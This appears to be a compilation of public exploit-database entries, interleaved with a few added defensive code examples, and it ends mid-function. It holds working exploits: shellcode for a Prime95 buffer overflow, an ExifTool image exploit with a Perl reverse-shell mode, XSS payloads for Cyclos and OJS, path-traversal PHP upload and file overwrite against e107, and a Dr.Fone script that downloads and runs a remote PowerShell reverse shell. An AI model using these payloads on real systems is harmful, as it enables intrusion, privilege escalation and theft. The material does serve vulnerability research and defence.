                'ADMIN_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_msg_html',
                'MANAGER_FILE_FORMAT': 'HTML',
                'MANAGER_ATTACHMENT_TYPE': 'FILE',
                'MANAGER_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_mgr_sub',
                'MANAGER_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_mgr_msg_html',
                'adscsrf': csrf
            }
            sch = s.post(surl, data=data, headers=headers, allow_redirects=False, verify=False)
            if 'adssp.reports.schedule_reports.storage_path.unc_storage_path' in sch.text:
                print('[-] The target is patched!')
                sys.exit(1)
            if sch.status_code == 200:
                print("[+] The report is scheduled. The NTLMv2 hash will be captured in five minutes!")
            else:
                print("[-] Something went wrong. Please, try it manually!")
                sys.exit(1)
    # A bare except here would also swallow the sys.exit() calls above and report them
    # as a connection error, so only transport-level failures are caught.
    except requests.exceptions.RequestException:
        print('[-] Connection error!')

def main():
    arg = get_args()
    domain = arg.domain
    auth = arg.auth
    user = arg.user
    password = arg.password
    target = arg.target
    listener = arg.listener
    scheduler(domain, auth, target, listener, user, password)

if __name__ == "__main__":
    main()
-
DLINK DIR850 - Open Redirect
# Exploit Title: DLINK DIR850 - Open Redirect
# Product: Dlink
# Model: DIR850
# Date: 14/1/2022
# CVE: CVE-2021-46379
# Exploit Author: AhmedAlroky
# Hardware version: b1
# Firmware version: ET850-1.08TRb03
# Vendor home page: https://www.dlink.com/

# Exploit:
Visit http://<IP Address>/boafrm/formWlanRedirect?redirect-url=http://attacker.com&wlan_id=1
-
DLINK DIR850 - Insecure Access Control
# Exploit Title: DLINK DIR850 - Insecure Access Control
# Product: Dlink
# Model: DIR850
# Date: 14/1/2022
# CVE : CVE-2021-46378
# Exploit Author: Ahmed Alroky
# Hardware version: b1
# Firmware version: ET850-1.08TRb03
# Vendor home page: https://www.dlink.com/

# Exploit:
Visit http://<IP Address>/config.dat
-
Prime95 Version 30.7 build 9 - Remote Code Execution (RCE)
# Exploit Title: Prime95 Version 30.7 build 9 - Remote Code Execution (RCE)
# Discovered by: Yehia Elghaly
# Discovered Date: 2022-04-25
# Vendor Homepage: https://www.mersenne.org/
# Software Link : https://www.mersenne.org/ftp_root/gimps/p95v307b9.win32.zip
# Tested Version: 30.7 build 9
# Vulnerability Type: Buffer Overflow (RCE) Local
# Tested on OS: Windows 7 Professional x86
# Description: Prime95 Version 30.7 build 9 Buffer Overflow RCE
# 1- How to use: open the program go to test-PrimeNet-check the square-Connections
# 2- paste the contents of open.txt in the optional proxy hostname field and the calculator will open

buffer = "A" * 144
jum = "\xd8\x29\xe7\x6e"  # push esp # ret | {PAGE_EXECUTE_READ} [libhwloc-15.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\ex\libhwloc-15.dll)
nop = "\x90" * 20  # NOP sled
hot = "C" * 100

# sudo msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A\x0d" -f python -v payload
payload = b""
payload += b"\xbb\x72\xd7\x5d\x16\xdb\xc0\xd9\x74\x24\xf4\x5d"
payload += b"\x29\xc9\xb1\x31\x83\xc5\x04\x31\x5d\x0f\x03\x5d"
payload += b"\x7d\x35\xa8\xea\x69\x3b\x53\x13\x69\x5c\xdd\xf6"
payload += b"\x58\x5c\xb9\x73\xca\x6c\xc9\xd6\xe6\x07\x9f\xc2"
payload += b"\x7d\x65\x08\xe4\x36\xc0\x6e\xcb\xc7\x79\x52\x4a"
payload += b"\x4b\x80\x87\xac\x72\x4b\xda\xad\xb3\xb6\x17\xff"
payload += b"\x6c\xbc\x8a\x10\x19\x88\x16\x9a\x51\x1c\x1f\x7f"
payload += b"\x21\x1f\x0e\x2e\x3a\x46\x90\xd0\xef\xf2\x99\xca"
payload += b"\xec\x3f\x53\x60\xc6\xb4\x62\xa0\x17\x34\xc8\x8d"
payload += b"\x98\xc7\x10\xc9\x1e\x38\x67\x23\x5d\xc5\x70\xf0"
payload += b"\x1c\x11\xf4\xe3\x86\xd2\xae\xcf\x37\x36\x28\x9b"
payload += b"\x3b\xf3\x3e\xc3\x5f\x02\x92\x7f\x5b\x8f\x15\x50"
payload += b"\xea\xcb\x31\x74\xb7\x88\x58\x2d\x1d\x7e\x64\x2d"
payload += b"\xfe\xdf\xc0\x25\x12\x0b\x79\x64\x78\xca\x0f\x12"
payload += b"\xce\xcc\x0f\x1d\x7e\xa5\x3e\x96\x11\xb2\xbe\x7d"
payload += b"\x56\x4c\xf5\xdc\xfe\xc5\x50\xb5\x43\x88\x62\x63"
payload += b"\x87\xb5\xe0\x86\x77\x42\xf8\xe2\x72\x0e\xbe\x1f"
payload += b"\x0e\x1f\x2b\x20\xbd\x20\x7e\x43\x20\xb3\xe2\xaa"
payload += b"\xc7\x33\x80\xb2"

evil = buffer + jum + nop + payload

file = open('PExploit.txt', 'w+')
file.write(evil)
file.close()
-
Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)
# Exploit Title: Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)
# Date: 17/04/2021
# Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services
# Vendor Homepage: https://www.cyclos.org/
# Version: Cyclos 4.14.7 (and prior)
# Tested on: Ubuntu
# CVE : CVE-2021-31673

# Description:
A DOM-based Cross-site scripting (XSS) vulnerability at registration account in Cyclos 4 PRO.14.7 and prior allows remote attackers to inject arbitrary web script or HTML via the 'groupId' parameter.

# Steps to reproduce:
An attacker sends a draft URL [IP]/#users.users.public-registration!groupId=1%27%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E to victim.
When a victim opens the URL, XSS will be triggered.
-
Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)
# Exploit Title: Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)
# Date: 18/04/2021
# Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services
# Vendor Homepage: https://www.cyclos.org/
# Version: Cyclos 4.14.7 (and prior)
# Tested on: Ubuntu
# CVE : CVE-2021-31674

# Description:
Cyclos 4 PRO 4.14.7 and before does not validate user input at error inform, which allows remote unauthenticated attacker to execute javascript code via undefined enum.

# Steps to reproduce:
An attacker sends a draft URL [IP]/#users.users.public-registrationxx%3Cimg%20src=x%20onerror=%22[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)%22%3E to victim.
When a victim opens the URL, XSS will be triggered.
-
ExifTool 12.23 - Arbitrary Code Execution
# Exploit Title: ExifTool 12.23 - Arbitrary Code Execution
# Date: 04/30/2022
# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)
# Vendor Homepage: https://exiftool.org/
# Software Link: https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
# Version: 7.44-12.23
# Tested on: ExifTool 12.23 (Debian)
# CVE: CVE-2021-22204
# Source: https://github.com/UNICORDev/exploit-CVE-2021-22204
# Description: Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image

#!/usr/bin/env python3

# Imports
import base64
import os
import subprocess
import sys


# Class for colors
class color:
    red = '\033[91m'
    gold = '\033[93m'
    blue = '\033[36m'
    green = '\033[92m'
    no = '\033[0m'


# Print UNICORD ASCII Art
def UNICORD_ASCII():
    print(rf"""
{color.red}        _ __,~~~{color.gold}/{color.red}_{color.no}       {color.blue}__  ___  _______________  ___  ___{color.no}
{color.red}    ,~~`( )_( )-\|       {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no}
{color.red}    |/|  `--.           {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no}
{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no}
""")


# Print exploit help menu
def help():
    print(r"""UNICORD Exploit for CVE-2021-22204

Usage:
  python3 exploit-CVE-2021-22204.py -c <command>
  python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
  python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
  python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
  python3 exploit-CVE-2021-22204.py -h

Options:
  -c    Custom command mode. Provide command to execute.
  -s    Reverse shell mode. Provide local IP and port.
  -i    Path to custom JPEG image. (Optional)
  -h    Show this help menu.
""")


# Run the exploit
def exploit(command):
    UNICORD_ASCII()

    # Create perl payload: the DjVu metadata string is evaluated by ExifTool,
    # so "\c${...}" smuggles perl code into it
    payload = "(metadata \"\\c${"
    payload += command
    payload += "};\")"

    print(f"{color.red}RUNNING: {color.blue}UNICORD Exploit for CVE-2021-22204{color.no}")
    print(f"{color.red}PAYLOAD: {color.gold}" + payload + f"{color.no}")

    # Write payload to file
    payloadFile = open('payload', 'w')
    payloadFile.write(payload)
    payloadFile.close()

    # Bzz compress file
    subprocess.run(['bzz', 'payload', 'payload.bzz'])

    # Run djvumake
    subprocess.run(['djvumake', 'exploit.djvu', "INFO=1,1", 'BGjp=/dev/null', 'ANTz=payload.bzz'])

    if '-i' in sys.argv:
        imagePath = sys.argv[sys.argv.index('-i') + 1]
        subprocess.run(['cp', f'{imagePath}', './image.jpg', '-n'])
    else:
        # Smallest possible JPEG
        image = b"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k="
        # Write smallest possible JPEG image to file
        with open("image.jpg", "wb") as img:
            img.write(base64.decodebytes(image))

    # Write exiftool config to file
    config = (r"""
%Image::ExifTool::UserDefined = (
    'Image::ExifTool::Exif::Main' => {
        0xc51b => {
            Name => 'HasselbladExif',
            Writable => 'string',
            WriteGroup => 'IFD0',
        },
    },
);
1; #end
""")
    configFile = open('exiftool.config', 'w')
    configFile.write(config)
    configFile.close()

    # Exiftool config for output image: embed the DjVu file as the value of tag 0xc51b
    subprocess.run(['exiftool', '-config', 'exiftool.config', '-HasselbladExif<=exploit.djvu', 'image.jpg', '-overwrite_original_in_place', '-q'])

    # Delete leftover files
    os.remove("payload")
    os.remove("payload.bzz")
    os.remove("exploit.djvu")
    os.remove("exiftool.config")

    # Print results
    print(f"{color.red}RUNTIME: {color.green}DONE - Exploit image written to 'image.jpg'{color.no}\n")
    exit()


if __name__ == "__main__":
    args = ['-h', '-c', '-s', '-i']
    if args[0] in sys.argv:
        help()
    elif args[1] in sys.argv and not args[2] in sys.argv:
        cmd = sys.argv[sys.argv.index(args[1]) + 1]
        command = f"system(\'{cmd}\')"
        exploit(command)
    elif args[2] in sys.argv and not args[1] in sys.argv:
        localIP = sys.argv[sys.argv.index(args[2]) + 1]
        localPort = sys.argv[sys.argv.index(args[2]) + 2]
        command = f"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({localPort},inet_aton('{localIP}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};"
        exploit(command)
    else:
        help()
-
e107 CMS v3.2.1 - Multiple Vulnerabilities
# Exploit Title: e107 CMS v3.2.1 - Multiple Vulnerabilities
# Date: 30/04/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 3.2.1
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### XSS Reflected - Via adding comment (Authenticated)

# POC Request:
GET /e107/news.php/fnzi4'onchange='alert(1)'?extend.1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: e107_tzOffset=-60; PHPSESSID=2ju9huul2lsl7565jpre0f2g40

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 08:02:42 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "71d7966eaa95fd8ac14da8baf3e0785d"
Content-Length: 25059
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

[...]
<div class='media' >
<form id='e-comment-form' method='post' action='/e107/news.php/fnzi4'onchange='alert(1)'?extend.1' >
[...]

The request path is reflected unescaped into the action attribute of the comment form. A user who clicks to comment on the news item, types any character in the comment field and then clicks elsewhere outside the field triggers the injected onchange handler.

(screenshot omitted)

### Upload restriction bypass (Authenticated [Admin]) + Stored XSS

An account with administrative privileges can bypass the image upload restriction (stored XSS from a .svg file):
Image -> Media Manager -> Upload a file -> Image/File URL
The admin can upload an SVG hosted elsewhere, here http://127.0.0.1:8070/xxe_svg2.svg

# POC Request:
POST /e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img
Cookie: e107_tzOffset=-60; PHPSESSID=t656bpkef7ndqm0p8j9ddf9atl
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fxxe_svg2.svg&upload_remote_url=1&upload_caption=

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 02:06:14 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "06ed5ef56b0f736995112cafd77e9ec0"
Content-Length: 20878
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr
[...]
<div class='well clearfix media-carousel-item-container'>
<a data-toggle='context' data-bs-toggle='context' class='e-media-select ' data-id='' data-width='0' data-height='0' data-src='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-type='image' data-bbcode='img' data-target='' data-path='{e_MEDIA_IMAGE}2021-12/xxe_svg2.svg' data-preview='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-preview-html='PGltZyBjbGFzcz0iaW1nLXJlc3BvbnNpdmUgaW1nLWZsdWlkIiBzcmM9Ii9lMTA3L2UxMDdfbWVkaWEvNDE2ZjQ2MDJlMy9pbWFnZXMvMjAyMS0xMi94eGVfc3ZnLnN2ZyIgYWx0PSJ4eGVfc3ZnLnN2ZyIgc3Jjc2V0PSIvZTEwNy9lMTA3X21lZGlhLzQxNmY0NjAyZTMvaW1hZ2VzLzIwMjEtMTIveHhlX3N2Zy5zdmcgMngiIHdpZHRoPSIyMTAiIGhlaWdodD0iMTQwIiAgLz4=' title="xxe_svg2.svg ()" style='' href='#' ><span><img class="img-responsive img-fluid" alt="" src="/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg" style="display:inline-block" /></span> </a>
[...]

The SVG is stored under e107_media/ and served back from the same origin, so any script it carries runs in the context of the site.

(screenshot omitted)

### Upload restriction bypass (Authenticated [Admin]) + RCE

Upload and execute a .PHP file. The attacker has to write the file to ../../../ (the parent of the application directory): in the author's tests the uploaded PHP code only executed when written to that parent directory, not when left in the media directory.

(screenshot omitted)

Media Manager -> Media Upload/Import -> From a remote location

# POC Request:
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Fcmd.php

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 09:02:08 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "5b9621fc78893e36034b14f841f840f8"
Content-Length: 26075
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr
[...]

The upload_caption value is used as the destination file name without stripping the ../ sequences, so the fetched file lands three directories above the media folder. The uploaded PHP file is then visible on the server side.

(screenshot omitted)

cmd.php file source:
<?php system('whoami'); ?>

(screenshot omitted)

### Upload restriction bypass (Authenticated [Admin]) + Server file override

With the same import function the attacker can overwrite an existing file, for example top.php in the main directory of the web application.

Original top.php on the server:

(screenshot omitted)

We can overwrite the file via the following upload functionality:
Media Manager -> Media Upload/Import -> From a remote location

# POC Request:
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Ftop.php

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 09:20:10 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "5b9621fc78893e36034b14f841f840f8"
Content-Length: 26075
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
[...]

The content of top.php was tampered with:
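Added example, not e107's code: the hardened form of the decision the remote-import handler above gets wrong, written in Python so that it can be run against the exact inputs from the three PoC requests. It derives a file name from `upload_caption` (or, failing that, from the URL), then refuses anything that resolves outside the media directory, anything whose extension is not a passive image type (so `.svg` and `.php` both fail), anything hiding an executable extension in an inner segment, and anything containing a path separator. The `e107_media/images` root, the `classify` wrapper and the example URLs are assumptions for the demonstration.

```python
import os
import posixpath
from urllib.parse import urlparse

# Passive image formats only. SVG is excluded because it can carry script (the stored XSS
# above); PHP and relatives are excluded because of the RCE above.
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif", ".webp"}
# Extensions that must not appear in any inner dotted segment either: Apache configurations
# using AddHandler treat "cmd.php.jpg" as PHP.
BLOCKED_SEGMENTS = {"php", "php3", "php5", "phtml", "phar"}


class UploadRejected(ValueError):
    """Raised with the reason an import was refused."""


def safe_media_path(media_root, remote_url, caption=""):
    """Decide where a remote-URL import may be written. The name comes from the caption
    when one is given (the PoC requests put the traversal in upload_caption), otherwise
    from the last path component of the URL. Returns an absolute path under media_root
    or raises UploadRejected; it never silently 'repairs' the name."""
    name = caption or posixpath.basename(urlparse(remote_url).path)
    if not name:
        raise UploadRejected("empty file name")
    # 1. containment: resolve the target and require it to stay under the media directory
    root = os.path.realpath(media_root)
    dest = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, dest]) != root:
        raise UploadRejected("destination escapes the media directory")
    # 2. the final extension must be on the allow-list
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_EXT:
        raise UploadRejected(f"extension {ext!r} not allowed")
    # 3. no executable extension hidden in an inner segment (cmd.php.jpg)
    if any(seg.lower() in BLOCKED_SEGMENTS for seg in name.split(".")[1:-1]):
        raise UploadRejected("executable extension in file name")
    # 4. keep the media directory flat: no separators or NUL bytes
    if any(c in name for c in "/\\\x00"):
        raise UploadRejected("directory separators in file name")
    return dest


def classify(media_root, remote_url, caption=""):
    """'accepted' or 'rejected: <reason>' for one import request."""
    try:
        safe_media_path(media_root, remote_url, caption)
        return "accepted"
    except UploadRejected as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    root = "e107_media/images"   # assumed media directory
    for url, caption in [
        ("http://127.0.0.1:8070/cmd2.php", "../../../cmd.php"),     # PoC 3
        ("http://127.0.0.1:8070/cmd2.php", "../../../top.php"),     # PoC 4
        ("http://127.0.0.1:8070/xxe_svg2.svg", ""),                 # PoC 2
        ("http://example.test/photo.jpg", ""),                      # benign
    ]:
        print(url, repr(caption), "->", classify(root, url, caption))
```

The containment check is listed first on purpose: it is the one that catches the `..%2F..%2F..%2F` captions from the PoCs even if an encoding trick slips past the separator check, because it works on the resolved path rather than on the string. Storing uploads under a server-generated random name, with only the validated extension kept from the request, removes the remaining dependency on user-supplied names altogether.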
-
PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
# Exploit Title: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
# Date: 31/01/2022
# Exploit Author: Hemant Kashyap
# Vendor Homepage: https://github.com/pkp/pkp-lib/issues/7649
# Version: PKP Open Journals System 2.4.8 >= 3.3
# Tested on: All OS
# CVE : CVE-2022-24181
# References: https://youtu.be/v8-9evO2oVg

XSS via Host header injection, and theft of another user's password reset token

Steps to reproduce:
1) Go to a site running OJS (https://who's-using-ojs-software.com).
2) Capture the request in Burp and send it to Repeater.
3) Add the following header after the Host header:
   X-Forwarded-Host: foo"><script src=//dtf.pw/2.js></script><x=".com
4) Click Send, then right-click the request, choose "Show response in browser" and copy the URL it gives you.
5) Paste that URL into a browser and the XSS pop-up appears.

Mitigation: update to a newer version.

All versions of the PKP Open Journal Systems software from 2.4.8 to 3.3.8 are vulnerable to XSS via Host header injection and to password reset token theft.
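Added example, not OJS code: the usual mechanism behind a "steal the password reset token via the Host header" finding, shown as a vulnerable link builder beside a hardened one. An application that assembles absolute URLs from `Host` or `X-Forwarded-Host` will email a reset link that points at whatever host the attacker supplied in the request that triggered the reset, and the token goes to the attacker when the victim clicks it; the same reflection is what makes the XSS payload above land in the page. The hardened version takes scheme and host from configuration and validates the incoming headers against an allow-list. The header precedence, the `CANONICAL_BASE` value and the reset path are assumptions; the advisory does not show OJS internals.

```python
from urllib.parse import urlsplit, urlunsplit, quote

# assumed site configuration value; the real application would read this from its config
CANONICAL_BASE = "https://journal.example.org"
RESET_PATH = "/login/resetPassword"     # assumed path, not taken from OJS


def reset_link_from_headers(headers, token, path=RESET_PATH):
    """Vulnerable pattern: build the link from what the request claims its host is.
    X-Forwarded-Host is preferred over Host, as proxy-aware code commonly does."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    scheme = headers.get("X-Forwarded-Proto", "https")
    return f"{scheme}://{host}{path}?token={token}"


def reset_link_from_config(base_url, token, path=RESET_PATH):
    """Hardened pattern: scheme and host come from configuration only, and the token is
    percent-encoded so it cannot break out of the query string."""
    parts = urlsplit(base_url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError("base_url must be an absolute http(s) URL")
    return urlunsplit((parts.scheme, parts.netloc, path, "token=" + quote(token, safe=""), ""))


def host_is_allowed(headers, allowed_hosts):
    """Reject the request early when Host or X-Forwarded-Host (port stripped, case-folded)
    is not one of the hostnames this deployment actually serves."""
    for name in ("Host", "X-Forwarded-Host"):
        value = headers.get(name)
        if value is not None and value.split(":")[0].lower() not in allowed_hosts:
            return False
    return True


# constructed request headers carrying the X-Forwarded-Host payload quoted in the advisory
POISONED = {
    "Host": "journal.example.org",
    "X-Forwarded-Host": 'foo"><script src=//dtf.pw/2.js></script><x=".com',
}

if __name__ == "__main__":
    print("vulnerable:", reset_link_from_headers(POISONED, "t0k3n"))
    print("hardened:  ", reset_link_from_config(CANONICAL_BASE, "t0k3n"))
    print("allowed?   ", host_is_allowed(POISONED, {"journal.example.org"}))
```

Two operational notes follow from this. A victim's own browser never sends a crafted `X-Forwarded-Host`, so the pop-up in step 5 demonstrates the reflection but the real exposure is in server-generated artifacts such as reset emails and cached pages; and the header should be stripped or overwritten at the reverse proxy, because an allow-list in the application only helps for deployments that get it right.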
-
Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)
# Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)
# Date: 4/27/2022
# Exploit Author: Netanel Cohen & Tomer Peled
# Vendor Homepage: https://drfone.wondershare.net/
# Software Link: https://download.wondershare.net/drfone_full4008.exe
# Version: up to 12.0.7
# Tested on: Windows 10
# CVE : CVE-2021-44595
# References: https://github.com/netanelc305/WonderShell

# Wondershare Dr. Fone (latest version as of 2021-12-06) is vulnerable to Incorrect Access Control.
# A normal user can send manually crafted packets to ElevationService.exe and execute arbitrary code,
# without any validation, with SYSTEM privileges.

#!/bin/python3
import msgpackrpc

LADDR = "192.168.14.129"    # attacker listener address
LPORT = 1338                # attacker listener port
RADDR = "192.168.14.137"    # host running ElevationService.exe
RPORT = 12345               # msgpack-rpc port exposed by the service

# ConPtyShell reverse shell back to LADDR:LPORT, launched through PowerShell by the service
param = f"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {LADDR} {int(LPORT)}"

client = msgpackrpc.Client(msgpackrpc.Address(RADDR, RPORT))
result = client.call('system_s', 'powershell', param)

# Listener on the attacker side:
# stty raw -echo; (stty size; cat) | nc -lvnp 1338
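Added example, not the authors' WonderShell code: the same `system_s` request built by hand with a minimal MessagePack encoder, so the bytes that cross the wire are visible without installing the msgpackrpc package. Knowing the exact frame is what a detection signature or a quick port probe needs. The method name `system_s` and the `(program, arguments)` parameter shape are taken from the exploit above; the request/response framing (`[0, msgid, method, params]` / `[1, msgid, error, result]`) is the msgpack-rpc specification. What ElevationService actually returns is not shown in the advisory and is not assumed here.

```python
import socket
import struct


def pack(obj):
    """Minimal MessagePack encoder: None, bool, non-negative int, str, list/tuple."""
    if obj is None:
        return b"\xc0"
    if isinstance(obj, bool):                       # must precede int: bool is an int subclass
        return b"\xc3" if obj else b"\xc2"
    if isinstance(obj, int):
        if 0 <= obj <= 0x7F:
            return bytes([obj])                     # positive fixint
        if 0 <= obj <= 0xFFFFFFFF:
            return b"\xce" + struct.pack(">I", obj)  # uint32
        raise ValueError("integer out of range for this encoder")
    if isinstance(obj, str):
        data = obj.encode("utf-8")
        if len(data) < 32:
            return bytes([0xA0 | len(data)]) + data  # fixstr
        if len(data) < 256:
            return b"\xd9" + bytes([len(data)]) + data  # str8
        return b"\xda" + struct.pack(">H", len(data)) + data  # str16
    if isinstance(obj, (list, tuple)):
        head = bytes([0x90 | len(obj)]) if len(obj) < 16 else b"\xdc" + struct.pack(">H", len(obj))
        return head + b"".join(pack(x) for x in obj)
    raise TypeError(f"unsupported type {type(obj).__name__}")


def unpack(data, pos=0):
    """Decode one value starting at pos; return (value, position after it)."""
    b = data[pos]
    pos += 1
    if b <= 0x7F:
        return b, pos
    if 0xA0 <= b <= 0xBF:
        n = b & 0x1F
        return data[pos:pos + n].decode("utf-8"), pos + n
    if 0x90 <= b <= 0x9F:
        return _unpack_array(data, pos, b & 0x0F)
    if b == 0xC0:
        return None, pos
    if b in (0xC2, 0xC3):
        return b == 0xC3, pos
    if b == 0xCE:
        return struct.unpack(">I", data[pos:pos + 4])[0], pos + 4
    if b == 0xD9:
        n = data[pos]
        return data[pos + 1:pos + 1 + n].decode("utf-8"), pos + 1 + n
    if b == 0xDA:
        n = struct.unpack(">H", data[pos:pos + 2])[0]
        return data[pos + 2:pos + 2 + n].decode("utf-8"), pos + 2 + n
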